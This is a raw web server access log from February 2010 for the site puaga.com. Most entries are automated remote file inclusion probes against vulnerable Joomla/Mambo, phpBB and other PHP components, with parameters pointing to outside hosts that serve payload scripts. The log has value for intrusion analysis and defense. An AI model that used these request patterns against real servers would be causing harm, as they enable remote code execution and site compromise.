213.239.230.130 - - [19/Feb/2010:07:58:03 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:58:03 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:58:03 -0800] "GET /logs/access_100208.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:58:07 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:58:07 -0800] "GET /logs/access_100208.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:58:07 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:07:58:33 -0800] "GET /logs/access_100210.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:07:58:37 -0800] "GET /logs/access_100209.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:07:58:41 -0800] "GET /logs/access_100125.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:07:58:41 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:07:58:41 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:58:43 -0800] "GET /logs/access_100113.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:58:43 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:58:43 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:58:54 -0800] "GET /logs/access_100210.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:07:59:03 -0800] "GET /logs/access_100201.log%20%20//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:07:59:04 -0800] "GET /logs//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:07:59:04 -0800] "GET /bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:07:59:25 -0800] "GET /logs/access_100210.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [19/Feb/2010:07:59:29 -0800] "GET /logs/access_100216.log HTTP/1.0" 200 1447964 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:07:59:31 -0800] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:07:59:31 -0800] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:07:59:47 -0800] "GET /logs/access_100117.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:08:00:33 -0800] "GET /logs//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:08:00:33 -0800] "GET /bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:08:00:33 -0800] "GET /logs/access_100203.log//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:08:00:41 -0800] "GET /logs/access_100125.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:08:00:41 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:08:00:42 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:08:00:43 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:08:00:43 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:08:00:43 -0800] "GET /logs/access_100208.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [19/Feb/2010:08:00:57 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [19/Feb/2010:08:00:57 -0800] "GET /orange_g/forum/viewtopic.php?p=27034 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
213.239.230.130 - - [19/Feb/2010:08:01:01 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:08:01:01 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:08:01:08 -0800] "GET /logs/access_100208.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:08:01:14 -0800] "GET /logs/access_100210.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:08:01:17 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:08:01:17 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:08:01:17 -0800] "GET /logs/access_100208.log%20%20//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:08:01:52 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:08:01:52 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:08:01:52 -0800] "GET /logs/access_100210.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:08:02:25 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:08:02:25 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:08:02:27 -0800] "GET /logs/access_100208.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [19/Feb/2010:08:02:42 -0800] "GET /logs/access_100206.log//admin/spaw/spaw_control.class.php?spaw_root=http://ticcamp.co.kr/hex/idtasikfeel.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [19/Feb/2010:08:02:43 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://ticcamp.co.kr/hex/idtasikfeel.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [19/Feb/2010:08:02:43 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://ticcamp.co.kr/hex/idtasikfeel.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:08:02:51 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:08:02:51 -0800] "GET /logs/access_100208.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:08:02:54 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:08:03:33 -0800] "GET /logs/access_100208.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:08:03:33 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:08:03:37 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:08:03:44 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:08:03:44 -0800] "GET /logs/access_100203.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:08:03:44 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:08:04:02 -0800] "GET /logs/access_100118.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:08:05:13 -0800] "GET /logs/access_100203.log%20%20//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:08:05:31 -0800] "GET /logs/access_100126.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [19/Feb/2010:08:06:44 -0800] "GET /logs/access_100207.log/include/prodler.class.php?sPath=http://bluehousejodhpur.com/modlogan/m_usage.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.833" "www.puaga.com"
89.221.175.32 - - [19/Feb/2010:08:06:44 -0800] "GET /include/prodler.class.php?sPath=http://bluehousejodhpur.com/modlogan/m_usage.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.833" "www.puaga.com"
89.221.175.32 - - [19/Feb/2010:08:06:44 -0800] "GET /logs/include/prodler.class.php?sPath=http://bluehousejodhpur.com/modlogan/m_usage.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.833" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:08:06:45 -0800] "GET /logs/access_100203.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:08:06:46 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [19/Feb/2010:08:06:46 -0800] "GET /logs/access_100119.log/include/prodler.class.php?sPath=http://bluehousejodhpur.com/modlogan/m_usage.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.833" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:08:06:46 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:08:06:58 -0800] "GET /logs/access_100201.log//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:08:07:00 -0800] "GET /logs/access_100118.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [19/Feb/2010:08:08:32 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [19/Feb/2010:08:08:32 -0800] "GET /logs/access_100125.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [19/Feb/2010:08:08:32 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.59.71.104 - - [19/Feb/2010:08:08:56 -0800] "GET /logs/access_100204.log//include/admin.lib.inc.php?site_path=http://www.ikyoku.co.kr//cgi/inquiry/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.59.71.104 - - [19/Feb/2010:08:08:56 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.ikyoku.co.kr//cgi/inquiry/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.59.71.104 - - [19/Feb/2010:08:08:57 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.ikyoku.co.kr//cgi/inquiry/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.59.71.104 - - [19/Feb/2010:08:09:43 -0800] "GET /logs/access_100117.log//include/admin.lib.inc.php?site_path=http://www.ikyoku.co.kr//cgi/inquiry/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.59.71.104 - - [19/Feb/2010:08:10:15 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.ikyoku.co.kr//cgi/inquiry/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.59.71.104 - - [19/Feb/2010:08:10:15 -0800] "GET /logs/access_100204.log%20%20//include/admin.lib.inc.php?site_path=http://www.ikyoku.co.kr//cgi/inquiry/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.59.71.104 - - [19/Feb/2010:08:10:16 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.ikyoku.co.kr//cgi/inquiry/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [19/Feb/2010:08:10:43 -0800] "GET /logs/access_100119.log%20/include/prodler.class.php?sPath=http://bluehousejodhpur.com/modlogan/m_usage.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.833" "www.puaga.com"
79.99.44.89 - - [19/Feb/2010:08:10:54 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [19/Feb/2010:08:10:54 -0800] "GET /logs/access_100123.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [19/Feb/2010:08:10:55 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [19/Feb/2010:08:11:00 -0800] "GET /logs/access_100123.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [19/Feb/2010:08:11:00 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [19/Feb/2010:08:11:00 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [19/Feb/2010:08:11:02 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [19/Feb/2010:08:11:02 -0800] "GET /logs/access_100123.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [19/Feb/2010:08:11:02 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [19/Feb/2010:08:11:34 -0800] "GET /logs/access_100202.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.59.71.104 - - [19/Feb/2010:08:12:26 -0800] "GET /logs/access_100117.log%20%20//include/admin.lib.inc.php?site_path=http://www.ikyoku.co.kr//cgi/inquiry/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [19/Feb/2010:08:13:08 -0800] "GET /logs/access_100204.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:08:14:16 -0800] "GET /logs/access_100126.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:08:14:27 -0800] "GET /logs/access_100204.log%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:08:14:28 -0800] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:08:14:28 -0800] "GET /index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:08:14:53 -0800] "GET /logs/access_100204.log%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:08:14:53 -0800] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:08:14:53 -0800] "GET /index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:08:15:01 -0800] "GET /logs/access_100204.log%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:08:15:01 -0800] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:08:15:01 -0800] "GET /index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:08:15:06 -0800] "GET /theme.php?THEME_DIR=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:08:15:06 -0800] "GET /logs/access_100130.log%20%20//theme.php?THEME_DIR=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:08:15:06 -0800] "GET /logs//theme.php?THEME_DIR=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.63.198.14 - - [19/Feb/2010:08:15:08 -0800] "GET /orange_g/forum/viewtopic.php?p=27101 HTTP/1.1" 404 5258 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "puaga.com"
58.150.99.144 - - [19/Feb/2010:08:15:12 -0800] "GET /logs//theme.php?THEME_DIR=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:08:15:12 -0800] "GET /theme.php?THEME_DIR=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:08:15:12 -0800] "GET /logs/access_100130.log%20%20//theme.php?THEME_DIR=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [19/Feb/2010:08:15:49 -0800] "GET /logs//?pagina=http://www.partyandmoreevents.de/two?? HTTP/1.1" 200 4947 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.puaga.com"
118.82.114.113 - - [19/Feb/2010:08:15:49 -0800] "GET /?pagina=http://www.partyandmoreevents.de/two?? HTTP/1.1" 200 3642 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.puaga.com"
118.82.114.113 - - [19/Feb/2010:08:15:49 -0800] "GET /logs//?pagina=http://www.alst.ru/cmd??&u=x HTTP/1.1" 200 4947 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.puaga.com"
118.82.114.113 - - [19/Feb/2010:08:15:49 -0800] "GET /?pagina=http://www.alst.ru/cmd??&u=x HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.puaga.com"
